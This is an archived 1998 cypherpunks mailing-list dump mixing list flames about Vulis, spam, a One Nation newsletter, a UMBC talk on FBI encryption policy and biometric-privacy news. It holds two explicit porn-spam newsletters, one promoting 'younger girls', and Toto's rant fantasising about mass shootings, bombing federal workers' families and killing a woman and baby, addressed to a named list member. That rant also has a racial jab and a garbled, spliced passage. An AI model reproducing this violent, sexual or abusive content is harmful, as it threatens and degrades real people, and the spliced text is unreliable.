And what makes you think Vulis will
not continue to post to the list?

You clearly HAVE NO IDEA WHAT JUST HAPPENED.

Comeback when you figure out the complexities of feedback.

   >       John Gilmore tried to be the censor last year....

Information Security has no idea why the list owner didn't succeed.

Detweiler my ass.

   >       Pat Buchannan and ol' Senator Exon will surely be happy 
   >       to see you.

Buchannan can bite me, and Exon was an old fart who never used the
Internet, yet proposed CDA as the law of the land.

   >       dont forget F{reeh,uck} is counting on your
   >       vote for mandatory GAK and KRAP.

Louis Freeh has the morals of a styrofoam cup, and GAK will
happen over my dead body. You've obviously never read my CM.

----

PSINet terminated Vulis for stalking, which I
documented he did to a minimum of four people.

It took me three traffic analysis reports to convince them.

"Fire One" was a success.
---guy

   KRAP? key recovery and poopies?



   >   
   >       I figured anyone active in cp would know how to filter,
   >       or at least know where the delete key is on his
   >       keyboard; but, on the hand, maybe I should not expect 
   >       so much from some of the posters with proven first 
   >       amendment ignorance and intolerance.
   >   
   >       you really gotta blow it out, to make my filter to the
   >       great bit bucket in fiery brimstone  --you did. 
   >   
   >   
   >   on or about 980213:1701, in <199802132201.RAA11745@panix2.panix.com>, 
   >       Information Security <guy@panix.com> was purported to have 
   >       expostulated to perpetuate an opinion:
   >   
   >   >As of 1pm today:
   >   
   >   >#   Guy,
   >   >#    
   >   >#   Thank you for the supporting documentation you've provided. #    
   >   >#   Dr. Dimitry V's PSINet service has been terminated.
   >   
   >   >...he called one person too many a 'pedophile'.
   >   >---guy
   >   
   >   
   >   -----BEGIN PGP SIGNATURE-----
   >   Version: 2.6.3i
   >   Charset: latin1
   >   Comment: No safety this side of the grave. Never was; never will be
   >   
   >   iQBVAwUBNOVa/LR8UA6T6u61AQHkMQH+OXg9mdu967ZX98RFLC0L2SvKgafFZliW
   >   s4OtdIjj9SRvizeBhesto7IRRtY5v/SXMAJDhLM9KuCP7eShtc0HzQ==
   >   =RFDZ
   >   -----END PGP SIGNATURE-----
   >   
   >   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 42197929@ix.netcom.com
Date: Sat, 14 Feb 1998 05:29:45 -0800 (PST)
To: Friend@public.com
Subject: Pharmaceutical, Biotech, & Laboratory Companies
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Pharmaceutical, Biotech, & Laboratories throughout the world 
use lyophilization (freeze-drying) equipment for preservation, 
concentration, and product development concepts.  Until now the
costs to employ this technology have been extremely high and 
operation has been complicated.

Ultra-Dry freeze-dryers are cost efficient, user friendly, 
portable and affordable.  These freeze-dryers are the answer to 
your needs from simple drying requirements to sterile product
development, packaging and validation.

If this information is applicable to another department in your 
organization please forward.

Explore the possibilities and click here at 
http://www.freezedry.com/html/upage1.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Sat, 14 Feb 1998 03:24:08 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Sat Feb 14 '98
Message-ID: <19980214083435.28655.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Saturday's issue of Eureka!

PINKBITS
Voted the  #1 Teen (18+) site  on the web,  this is  one pay
site you  don't want  to miss out on!  Here's just one quote
from a satisfied member:  "This site delivers awesome value.
I have been a member of 3 other sites,  and this is the best
by far. It has the best pics, more live video, younger girls
and more  hardcore cumshots  than the  other sites  put tog-
ether".  And we have negotiated a special FREE trial member-
ship for Eureka subscribers, so don't take our word, go see!
PinkBits .. http://207.33.10.198/cgi-bin/gate1/pbm/pb_0024/0

Amazing Teen Cocksuckers
http://pandobox.com
Memberships include,40,000 jpg pix,over 300 live hardcore
feeds, monthly interactive porn magazine, 1 gig of movies
clips, 300 sexy stories and x-rated games to play offline.


INDEX OF PRETTY MODELS
Pussy packed free picture website of the Asian persuasian!
Until you can take that trip to the Orient you have always 
wanted to.  Click below for a starter.  Hot looking young
women with thick dark eastern pussy and sweet little tits!
Index ................... http://www.pblife.com/gc/home3.htm

HAMADA'S PHOTO GALLERY
You have it all with Eureka!  And keeping that in mind and 
because it has been requested by many of you here is a more
artistic Asian website.  Click the nude room then nude vol 6
for the good stuff.  Sweet dark oriental pussy, free for us!
Hamada's ............ http://www.cup.com/hamada/HPG/HPG.html

KIMSPAGE
Oh yes we do like Kim.  She is an exhibitionist.  Check out
her pics.  You will not be sorry!  Perhaps the largest pics
on the internet today 1080x867 !!!  Her pussy jumps out of 
your computer monitor and excites!  Look now I dare you to.
Guess what!  I almost forgot she has six free video clips!
Kimspage ................ http://www.kimspage.com/start.html

TEASING TERRI
One hot little tramp!  Or maybe a vamp?  This brunette has
a super body and she shares it with the world on her very
website. You have got to see her tits, ass and tight little
pussy.  Click on free stuff to see her pix and there are
also some videos!  Score one for the amateur teen, Terri!
This is some of the hottest free video clip action out there!
Teasing .......... http://www.microrave.com/tease/start.html

READ THIS!! WIN $25,000 and a Fantasy Date - Click Here Now!
$25,000! ---> http://208.195.150.31/us/us_main.cgi/us_5267/A

HOORAY! THE ADULT SEARCH ENGINE
Now you can search for the sex sites you are looking for and
fast!  This new search engine is setting the standard others
will follow.  It offers pop-up search and detailed listings!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
6 RealVideo ----> http://www.sexhost.net/dagwood/index2.html

CHAT WITH OTHER READERS
Hey,  if you haven't checked out the Eureka! Chat sites yet,
you're  missing out  on some  great stuff.  Every day you'll
find hundreds of other readers just like you looking to chat
have fun and maybe a little 'cyber'. We know you'll love it!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

HOT LIVE PHONE SEX TO MAKE YOU CUM!
LD Call only! - Live Hot Girls!!!!----------->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

NEW! CENTERFOLD PIC OF THE DAY
Exclusive!  We proudly present  unpublished Pictures of your
favorite Centerfolds.  Featured This Week: Dec 80-PMOY Terri
Welles, Dec 89-Petra Verkaik, Sept 93-Carrie Westcott, Kerri
Kendall,  Rebecca Ferratti,  Lydia Schone and many more too!
---------------------------> http://www.gatefold.com/eureka/

AMATEUR SITE OF THE DAY
Jessica: The ultimate hard body, big titted blonde!! We have
2 words that immediately come  to  mind when looking at this
luscious babe "YUM YUM" She  looks  good  enough to eat! She
loves to dance, and loves  men  who are nasty! Nothing turns
her on in bed like a  man  that whispers dirty thoughts into
her ear! Stop by and view a little piece of heaven!
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
WifeSluts.com:  An  incredible  selection  of  true,  reader
submitted sex stories  detailing  the  private sexcapades of
real slut wives. A wide selection of submitted wife slut XXX
pics too! ........................ http://www.wifesluts.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Woah,  our Adult Star pics are getting hotter and hotter, so
make sure you stop by and check out today's - definitely not
to be missed! --------> http://www.xxxadultstars.com/eureka/

OTHER EUREKAS!
GAY EUREKA! ----------> http://eureka.abc-web.com/gayeureka/
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?140
Pic  2 --------------------------> http://137.39.63.229/?141
Pic  3 --------------------------> http://137.39.63.229/?142
Pic  4 --------------------------> http://137.39.63.229/?143
Pic  5 --------------------------> http://137.39.63.229/?144
Pic  6 --------------------------> http://137.39.63.229/?145
Pic  7 --------------------------> http://137.39.63.229/?146
Pic  8 --------------------------> http://137.39.63.229/?147
Pic  9 --------------------------> http://137.39.63.229/?148
Pic 10 --------------------------> http://137.39.63.229/?149

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Fri, 13 Feb 1998 18:03:13 -0800 (PST)
To: (Recipient list suppressed)
Subject: Pauline Hanson's Newsletter
Message-ID: <1.5.4.32.19980214002657.006d4090@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


Issue 1.7, February 1998

----------------------------------------------------------------------------
PLEASE NOTE: No unsolicited email is sent. If you do not want to be on the
mailing list please say "REMOVE" in the subject line and return this message
in the body.
----------------------------------------------------------------------------

Dear supporters in NSW,

You may not have seen the recent article in the Australian Financial Review
(3rd Feb 1998). Here is a short summary.

The subject is political donations:

Over 90% of loans (or $4,650,000) to the Liberal Party have been made by one
body -  the Greenfields Foundation. This organisation has strong links with
the Liberal Party's funding vehicle, the Free Enterprise Foundation which
was caught out in the 1995 crackdown of the disclosure law. The post box of
both is the same and the trustee of the Free Enterprise Foundation since
1981, Tony Bandle, responded to the Australian Electoral's Enquiries about
disclosures by the Greenfields Foundation.

The Greenfields Foundation has 'lent' the Liberal Party over 80% of its
total donations to avoid disclosing just who the donors to Greenfields are.

We know that most large donations received by both the Liberal and
Australian Labor Party are from multinationals - the benefactors of the
multilateral agreement on investment (MAI) (eg Village Roadshow over
$200,000; ANZ Bank over $100,000). 

Benefactors of the MAI, like media giant News Limited, have gone out of
their way to try to close down donations to One Nation by alleging large
commissions and rewards for One Nation National Director David Ettridge. 

These claims are false and have one aim - to financially cripple Pauline
Hanson's One Nation while multinationals quietly throw hundreds of thousands
of dollars at the major parties to support their next federal campaign - one
would be a fool to believe there is no contra.

Meanwhile, the Liberal Party have refused to return over $50,000 to me after
my win in the seat of Oxley. Most of the money would be used by me to
benefit the Oxley electorate. See my on-line press release for full details:

http://www.gwb.com.au/onenation/press/130298a.html 

Finally, on the subject of political donations it should come therefore as
no surprise that both Kim Beazley and John Howard's foreign minister
Alexander Downer have said that 'MAI is good for Australia'.

Please visit:

http://www.gwb.com.au/mai.html

and be the judge.

We desperately need your donations to ensure that One Nation can present a
strong case at the next Federal Election. We are calling on 'people power' -
that's you - to help us by making a donation, no matter how small it is
important. 

If you believe, like I do that Australia has got to be turned around what
cost can be too  much for the sake of our children and their children?

Please contact the Manly office on (02) 9976 0283 or complete and return the
donation form at:

http://www.gwb.com.au/onenation/funds.html

For those of you who are members of Pauline Hanson's One Nation we are
holding a celebration of the party's first anniversary over the Easter
Weekend (April 10-12) on my rural property near Ipswich in South East
Queensland. In true Australian style camping and bar-b-ques under the
starlit sky will be the order of the day. There will be competitions,
entertainment like bush dancing, karaoke and horse racing - and much, much
more. 

If you are interested please contact (07) 3369 8214, 3848 2197, 3399 6662 or
3399 6901 for details.

Costs range from $25 per day for adults or just $45 for the three. Families
from $55 for the one day to $85 for the three.

Book before you put this one in your diary (limited numbers)!


Finally important Internet addresses:

Pauline Hanson's One Nation:
http://www.gwb.com.au/onenation

One Nation Press Releases (about 10 in the last month):
http://www.gwb.com.au/onenation/press/




Pauline Hanson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. Alan Sherman" <sherman@cs.umbc.edu>
Date: Sat, 14 Feb 1998 09:44:27 -0800 (PST)
To: Crypto Announce <theory-local@cs.umd.edu
Subject: Barry Smith (FBI) to speak on encryption policy at UMBC
Message-ID: <Pine.SGI.3.91.980214124207.14595A-100000@pomeranian.cs.umbc.edu>
MIME-Version: 1.0
Content-Type: text/plain


   The UMBC Security Technology Research Group presents

     A Law-Enforcement Perspective on Encryption Policy

			Barry Smith
	       Supervisory Special Agent, FBI

	    moderated by journalist Peter Wayner

		      3:30pm - 5:00pm
		   Friday, March 6, 1998
		      Lecture Hall III
	       University of Maryland, Baltimore County
    http://www.cs.umbc.edu/events/spring98/crypto.shtml

The second lecture and discussion in a two-part forum on
encryption policy.  Journalist Peter Wayner will introduce
and moderate the event, which is free and open to the
public.  In Part I, freedom activist John Gilmore and Fritz
Fielding (Ex-Associate General Councel, NSA) gave their
divergent views, focusing on the Burnstein case.

Barry Smith will articulate the needs of law enforcement to
conduct lawful wiretaps; he will advocate the use of
key-recovery techniques to achieve this end as a way that
provides adequate privacy to law-abiding citizens.

Schedule: The event will begin with a brief (10 minute)
introduction by Peter Wayner.  Following Barry Smith's talk,
which will last approximately 45 minutes, there will be an
opportunity to ask questions for approximately 20-30
minutes.

Questions: Attendees are encouraged to ask questions in
advance by sending email to sherman@cs.umbc.edu

Directions: Take Exit #47B off interstate I-95 and follow
signs to UMBC.  LH III is in the Administration Building,
adjacent visitor's parking lot near the I-95 entrance to
UMBC.  

Host: Dr. Alan T. Sherman
      Associate Professor, Computer Science
      sherman@cs.umbc.edu
      http://www.umbc.edu
      (410) 455-2666

     This event is held in cooperation with the UMBC
	       Intellectual Sports Council
		       Honors College
	       Phi Beta Kappa honors society
                   CMSC Council of Majors
		   IFSM Council of Majors





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ah1261@aol.com
Date: Sat, 14 Feb 1998 13:23:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: crackers
Message-ID: <f27464ed.34e60b2a@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I WOULD LIKE SOME INFO ON PASSWORD CRACKERS EMAIL ME BACK A.S.A.P.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Tanner <tanner@nersp.nerdc.ufl.edu>
Date: Sat, 14 Feb 1998 19:56:07 -0800 (PST)
To: CYBERTELECOM-L@listserv.aol.com
Subject: Seeking Paper Submissions
Message-ID: <1.5.4.32.19980215035640.006bcb5c@nersp.nerdc.ufl.edu>
MIME-Version: 1.0
Content-Type: text/plain


The Journal of Technology Law & Policy an online journal devoted to the
discussion of the legal issues concerning technology is requesting article
submissions for our upcomming issue.  We invite anyone who has an article of
original work discussing a legal issue which pertians to any aspect of
high-technology (communciation technology, copyright, trademark, patent,
software, y2k conerns, internet issues) to submit the article for
consideration for publication in our journal.  Relevant graphics audio and
video may be utilized.  

There is no length limitations for submissions.  All citations should
conform to The Bluebook: A Uniform System of Citation 16th. ed.  Please
include the URL of any cited information available online.  

Interested writers should send 2 hard copys of thier article as well as a
digitized copy in either Wordperfect 6.1 or MS Word 97 format to the
following address:
        Journal of Technology Law and Policy
        University of Florida College of Law
       PO Box 117640
       Gainesville, FL 32611-7640
       USA
If you have any questions please feel free to contact us at (352)392-0261.
>>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Sat, 14 Feb 1998 22:24:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Space Aliens Hide My Drugs / Prologue (1/0)
Message-ID: <3.0.5.16.19980214232237.3d37b8ec@mailhost.sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


	____________________________________
	SPACE ALIENS HIDE MY DRUGS !!!???!!!
  	____________________________________
		by The Author
			Copyright 2000, The Lost Planet Airmen

PROLOGUE:
--------
  I was very young as a dark and stormy Knight...

[Author's Note: This part of the prologue is numbered 1-of-0 because there is,
 in reality, no telling how long, wide and far I may or may not ramble in 
 telling a tale which lies deep inside of me and cries out to be told, despite
 the rapid degeneration of what little is left of my nervous system, my brain
 function, and my sanity in general.
 As well, after a lifetime of using an overwhelming excess of commas in my
 sagacious scribblings and blitheful blatherings, I am well aware that commas
 do not grow on trees (except for cherry trees, and they are upside down--thus
 of no use to a scribe such as myself) and that this account of tales untold
 since the beginning of time (1949, in my universe) may well end in
mid-sentence
 when I have used the last of the commas that I have purloined, stolen and
 hoarded, over the years, is removed from my secret hiding place and placed on
 the written page.
 Hopefully, before this has come to pass, I will have managed to reveal all of
 the myriad of universal secrets which have remained hidden in plain sight of
 us all (particularly George Carlin), since the founding of the universe, and
 the final comma that marks the end of my wisdom will mark the beginning of a
 new universal ignorance, in which all shall finally know that there *is*no*
 knowledge*, and that "The ClueServer died for our sins".]

 
The Death of gomez and the Birth of Magical Thinking:
  I am the Prophet...
  It's not something I'm proud of, and I in no way planned for things to turn
out this way, but the role of Unerring Prophet of the Future of All Mankind
was forced on me by circumstances beyond my control.
  Originally, I was just trying to be a brain-warped, cynical asshole--doing
my best to stir up shit, cause trouble, spreadFear/Uncertainty/Disinformation
to the best of my ability, and maintain a conscientiously applied plan of good
oral hygene. ("Thank you. I'm feeling much better, now.)

  I've been crazy all of my life, having suffered serious brain injury as a 
child, and compounding this natural disaster by a willful ingestion of a
variety
of legal and illegal substances designed to enrich pharmacists and people with
dark skin tones who spend much of their time on dimly-lit street corners.
  There are those who read my apparently mad ramblings and assume that I am
some kind of creative writing genius heavily influenced by Hunter S. Thompson,
Carlos Castenada, Stephen King and William Burrogh's Jr. They are wrong.
  As gomez himself said, before being removed as the eternal symbol of the
true Digerati, the Circle of Eunuchs, "We don't make it up, we just make it
better."
  Thus, when I describe the series of ElectroShock treatments that I underwent
under the care of Dr. Abram Hoffer (the Father of Megavitamin Therapy), and 
describe them as taking place at the exact same moment as the massive power
blackouts throughout the NorthEastern United States and Canada, the details
I provide may not be accurate within the time-space continuum, but they will
be totally consistent with the Ultimate and Eternal Truth as evidenced by the
True Measure of Reality--the electrical bill from SaskPower Corporation that
was presented to Central Hospital in Saskatoon, Saskatchewan, which ultimately
resulted in the restructuring of the Saskatchewan MediCare system, and the
loss
of many lives that could have otherwise been saved if the medical profession
had not deemed it necessary to store within my brain enough electricity to
create a thousand FrankenSteins, or power the bright lights of Las Vegas for
a hundred years, in the case of an emergency.

  Hyperbole? Guess again, shit-for-brains...
  Anyone who has read "The News of the Weird" by Chuck Shephard can vouch for
the fact that the crap that backs up in my demented brain cells, until it
spills
out like a toxic efflusive onto the written page, could not carry the
jock-strap
of the events which happen every day, in real life, far removed from the
short-
circuting electrical malfunctions spewing forth from my damaged brain
synapses.

  I am the Prophet...
  I am a certified lunatic bouncing wildly back and forth between reality and
rational thought <--> magical thinking fueled by messages from Mars which I
receive hourly via the silver fillings in my decaying dentures <--> logical
assumptions based on the patterns formed by rat-droppings I use to encrypt
my writings with the same algorithms used as the basis for C2Net's Stonghold
encryption software.

  In all honesty, I have to admit that I was lying when I presented myself to
WebWorld at large as the TruthMonger.
  But, "The best laid plans of rats and men..."

  My poor self-image, my low self-esteem, and the knowledge that I had come
by them honestly, drove me to a state where I was determined to live out my
life as a lying, thieving, conniving, rat-bastard-piece-of-shit who would crap
on and distort the truth about everything that normal, decent people hold
sacred in their lives.
  So I used my computer skills, my limitless supply of amphetamines, and my
powers of obsessive-compulsive, psychotic fixation to rail madly against 
the surrounding hordes of men and women of reason who strove to suffocate the
madness that I was destined from birth to manifest on the long and twisted
road which would ultimately lead to my emergence as the Anti-Christ who would
raze the complete face of the earth with violent spasms of death and
destruction
the likes of which the universe has never seen.

  "It's life's illusions I recall...I really don't know life, at all."
~Joni Mitchell
  "All my lies are true...and everything I do, I really am."
~Carroll
  "Some say he's good...some say he's great...some just say, 'It's a *shame*
about that boy.'"
~Sonny King, introducing C.J.Parker, the King of Country Porno, at Club Foot
 in Austin, Texas, at a benefit for Xalapeno Charlie.

  In the end, I reached spiritual enlightenment through the realization that
Satan, the Evil One, the Anti-Christ, Bill Gates, Louis Freeh, Janet Reno, can
never hope to even remotely approach the depths of depravity, outrageous
licentiousness and lunacy, or sick and twisted dementia exhibited daily by
the average Jane and Joe smiling at us from the other side of the bank
manager's
desk, or the check-out counter at the local K-Mart.
  No matter how depraved the sick, demented spewings from my evil mind became,
attempting to poison the minds of all who came into contact with my evil,
satanic blatherings, masquerading as a true mirror of the reality that
surrounds
us--in the end, I was, am, and will continue to be...TruthMonger.

  I am the Prophet...
  If my sick, twisted mind concocts some bizarre, depraved fantasy about Lisa
Bonet Ramsey's rotting carcass rising from a roadside ditch to plug parking
meters and being flown by the Cincinnati Police Department to New York City
to carry out Judge Ito's sentence of having a toilet plunger shoved up her
ass, then one of two things will happen.
  Either CNN will break the story, exactly as I have described it, minutes
before my missive shows up on the InterNet, or I will receive the lastest
email version of "News of the Weird,"l from SaskPower Corporation that
was presented to Central Hospital in Saskatoon, Saskatchewan, which ultimately
resulted in the restructuring of the Saskatchewan MediCare system, and the
loss
of many lives that could have otherwise been saved if the med as standing at the bleeding edge of
the burdgeoning computer technology which is rapidly changing the face of our
planet and the governmental, civil, and social societies encompassed within
this celestial orb.
  Harbingers of the Digital Future / Pioneers of Future Technology / etc.,
etc.
  Bullshit...
  The CypherPunks are rag-tag band of infantile, pseudo-anarchistic, pseudo-
cryptic, well-educated shit-disturbers who take great pleasure in pissing on
themselves, each other, and the world around them--all the while, covering
their motivations and ambitions with high-sounding ideals intended to disguise
the fact that none of them ever received proper toilet-training.

  The end result?
  No matter how high they pile it, how far they spread it, or how badly it 
smells when you step in it, they end up coming off as the Henry Kissinger's
of CyberSpace, because no matter how much rotten meat, jalapenos and moldy
cheese they eat, they can never manage to crap out anything so vile and foul-
smelling that the world-at-large cannot prove prophetic in MeatSpace.

Question for Blanc Weber (CypherPunks version of the Sweetheart of the Rodeo):
  Yes, Blanc, I am the one who was hiding in the bushes near the gravesites
when you were laying the wreaths in honor of Mother Teresa and the children
who were the 'victims' of the Oklahoma Federal Building bombing. Yes, that
was me who was whistling the eerie medely of "Psycho Killer" and "Street 
Fighting Man" while you were busy trying to honor the souls of the 'innocents'
who died for the sin of being born.
  Realizing that we are polar-opposites, I am willing to concede that perhaps
Eternal Truth, True Justice and A Noble Ideal To Be Named Later might best be
served if you and I met in the middle and acted in concert to do what must
inevitably be done to balance the distorted energy of the Tao which is
currently
tearing our planet, our socities and our individuals to pieces.

  I am ready now...when will you be ready?
  I am ready to walk into Luby's cafeteria today, and start blowing away
people
I know and total strangers, for no real fucking reason, just to stop the
voices
inside my head which scream such things as "Wake Up America"/"What the Fuck
are
We all Doing to One Another"/"When will the Madness STOP!!!"
  When will you be ready?
  I am ready to kidnap men, women and children who are federal employees, or
related to them, or who sent them Christmas cards, or who failed to punch
their
fucking lights out when they fucked over those they are supposed to 'serve'
because of some obscure legal technicality passed by drunken, syphlittic 
politicians in a previous century. I am ready to transport them to the site
of the OKC bombing in numbers amounting to hundreds of times of McVeigh's
victims, bombing their innocent souls into oblivion, in the hope that someone,
somewhere, will look into the eyes of the psychotic, deranged madman that I
have become, and see themself, and their neighbors, desperately trying to
maintain the illusion that their hands are free of blood when foreign children
die as a result of embargos placed within the imaginary political lines which
define our MeatSpace Reality--embargos placed by those that they themselves
voted for in return for the promise that *their* children, on the 'good' side
of the imaginary line, would be provided with good nutrition and a sound
future,
unless, of course, they live in one of the poorer states, or America needs a
larger military budget to defend the most powerful military nation in the
world from some flea on the ass of an Iranian camel.
  Blanc, when will *you* be ready?
  I am ready, today, to gun down a woman carrying a baby, killing them both,
and justifying my actions by claiming I thought she was a Somalian warlord--I
am ready to drive a tank to MicroSoft Corporate Headquarters and raze it to
the ground, killing men, women and children in a violent cataclysm of smoke
and flames, justifying it with claims that MicroSoft cult members are all
gun-hoarding child-molesters who think Bill Gates is Jesus.
  When will you be ready...?

  The optomist says that the human soul is half full.
  The pessimist says that the human soul is half empty.
  The realist says, "Kill 'em all, and let God sort them out."
  Tim May says, "Broken eggs, and all that."
  
  I say, "The Revolution is NOW!"
  What do *you* say?
  Shall we set a date, sweetheart?

[TBC]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Sun, 15 Feb 1998 14:26:20 -0800 (PST)
To: Tim May <tcmay@got.net>
Subject: Re: The Octopus and America as the Evil Empire
In-Reply-To: <v03102802b10b83784f0d@[24.234.31.57]>
Message-ID: <3.0.5.32.19980215011846.008b9320@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:58 AM 2/14/98 -0800, you wrote:
>(I was told by a usually reliable source that AT&T rerouted some of their
>Long Lines to cross Indian reservations...thus allowing interception by the
>TLAs without violating the laws about domestic surveillance. Is this true?
>I haven't done any research to try to verify this, but it wouldn't surprise
>me. The UK-USA agreement is already a way to circumvent the "no domestic
>surveillance without a court order" laws, as we all know by now.)

I haven't a clue who to ask, but it would surprise me a bit.
	[#disclaimer: personal opinion only, not AT&T's]
If it was done, it would have been for microwave lines,
which are mostly obsolete except in places like
Southern Utah and parts of Montana and the Dakotas which
don't have enough population density to justify replacing with fiber.
Much more likely they were routed through reservations for 
cheap right of way.  Most of the routes have been pretty stable
for a long time, because of right-of-way issues, and many of them
date from back before the FBI and CIA worried about little details
like Constitutionality and different rules on Indian reservations.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Sat, 14 Feb 1998 23:56:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Consumer Biometric Privacy Protection Act of 1998
Message-ID: <199802150756.CAA29542@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.zdnet.com/zdnn/content/zdnn/0213/285183.html

[snip]
Labeled the "Consumer Biometric Privacy Protection Act of
1998," the bill prohibits trafficking in biometric databases,
mandates increased security for storing such data, and
prevents businesses from recording data for biometric
identification without the owner's consent. The bill also
increases the severity of identity theft, from a misdemeanor
to a felony. 

"How would you like your fingerprints to be sold over the Internet?"
[snip]

"[Biometric] identifiers [have the potential] to provide an
efficient, unintrusive, and accurate means of identifying
consumers in a variety of commercial and government
applications," said the text of the bill. 
[snip]


A massive proliferation of "fingertip scanning" products...

http://www.zdnet.com/zdnn/content/pcwk/1505/279078.html

In separate efforts to strengthen the rapidly evolving
biometric industry, vendors and industry groups have
announced three separate biometric APIs, each proposed
as "the standard API" for biometric application
development. Now the real work begins, as developers,
users, industry associations, manufacturing interests and
government agencies express their opinions on which to
back or on how to roll them into one.
[snip]

The National Registry Inc. (www.nrid.com) was the first to
unveil a universal standard, dubbed HA-API, although
IBM had announced its coming API previously. NRI
developed HA-API as an initiative for the U.S. Department
of Defense. The outcome is a high-level umbrella for any
biometric technology, although the specification currently
supports only the Win32 environment. NRI has
demonstrated HA-API's capability by implementing it in its
line of fingertip scanning products, as well as in Keyware
Technologies Inc.'s Voice Guardian speaker verification
product.
[snip]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mfc@daltek.net
Date: Sun, 15 Feb 1998 02:21:19 -0800 (PST)
To: mfc@daltek.net
Subject: Can't Find Your Site?
Message-ID: <199802151002.FAA02448@apollo.redcomet.net>
MIME-Version: 1.0
Content-Type: text/plain


* * * * 
 You have been carefully selected to receive the following as a 
 person obviously interested in this subject based upon your 
 previous internet postings, or visits to one of our affiliate web 
 sites.  If you have received this message in error, please accept 
 our apology as a responsible e-mailer, and reply with the word 
 REMOVE in the subject line. You will be automatically excluded 
 from future e-mailings. Thank you for your consideration and help 
 in making the Internet spam-free. 
***** 
Does anyone really know where your site is? Can you be found
on the top search engines? Go to http://guide-p.infoseek.com/
and type in your business type and your geographical location. 
Do you show up in the top ten listings? If not, potential clients 
will never find you.

We can guarantee that you get listed in the top ten. 
We can get you listed in the top ten on all the major search
engines. But right now we are offering a "get to know us
discount" on Infoseek. Infoseek was visited by 11.7 million users 
in January of 1998. We have chosen infoseek for this special offer
based on its popularity and the fact that it immediately inputs 
sites into its database. We will GUARANTEE a top ten ranking within 
7 days!! 

Millions of potential clients search for businesses on Infoseek
each month. How many clients have you already lost? How much money
have you spent on your website with no return? Your website is
literally (and financially) dying to be seen.

We usually charge $300 for a guaranteed top twenty ranking. Through
March 1st we are only charging $150 and we will GUARANTEE A TOP
TEN RANKING based on your business type and your geographic
location!!

To contact us call (603)773-5904 or reply to this email with 
a phone number. You may also reply to this email with "Make us 
visible" in the subject line for more information.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Sun, 15 Feb 1998 01:48:31 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Sun Feb 15 '98
Message-ID: <19980215081715.18977.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Sunday's issue of Eureka!

PUSSY PARADISE
Yet again Eureka! has managed  to negotiate a special week's
free access  to one of the web' s premier porn sites.  Pussy
Paradise is simply  packed with 100s  of videos (many live),
thousands of photos,  and so much more.  You will  need your
credit card as adult verification but it will not be charged
for your free week! So check it out - there's smut a plenty!
Pussy Paradise .... http://www.pussyparadise.com/eureka.html

SINFUL'S 20 FREE XXX PICS
http://www.sinful.net/cgi-bin/topvlog.cgi?eureka
20 FREE HARDCORE, CUMSHOT, GROUPSEX, AND FREE ANALSEX PHOTOS
UPDATED WEEKLY PLUS LINKS TO 700+ FREE ADULT PICTURE SITES.
CATEGORIES INCLUDE: ASIAN, HARDCORE, SOFTCORE, BABES, AND
PIC LINKS. YOU GET ALL OF THIS FOR FREE!! VISIT US NOW!!

NAUGHTY NEIGHBOR
Make a quick pit stop here for some great free pix of one hot
neighbor!  She rolls several free video clips.  Get them and
see her rub her major pussy lips. That is my kind of neighbor!  
Naughty Neighbor ........... http://www.naughtyneighbor.com/

ANNIE'S WEB PAGE
This site features a blonde with great tits.  We like this
combination!  There are several free images and even some
free video clips!  One features a great scene of her playing
with here breasts!  A definite download here guys!  Nipples!
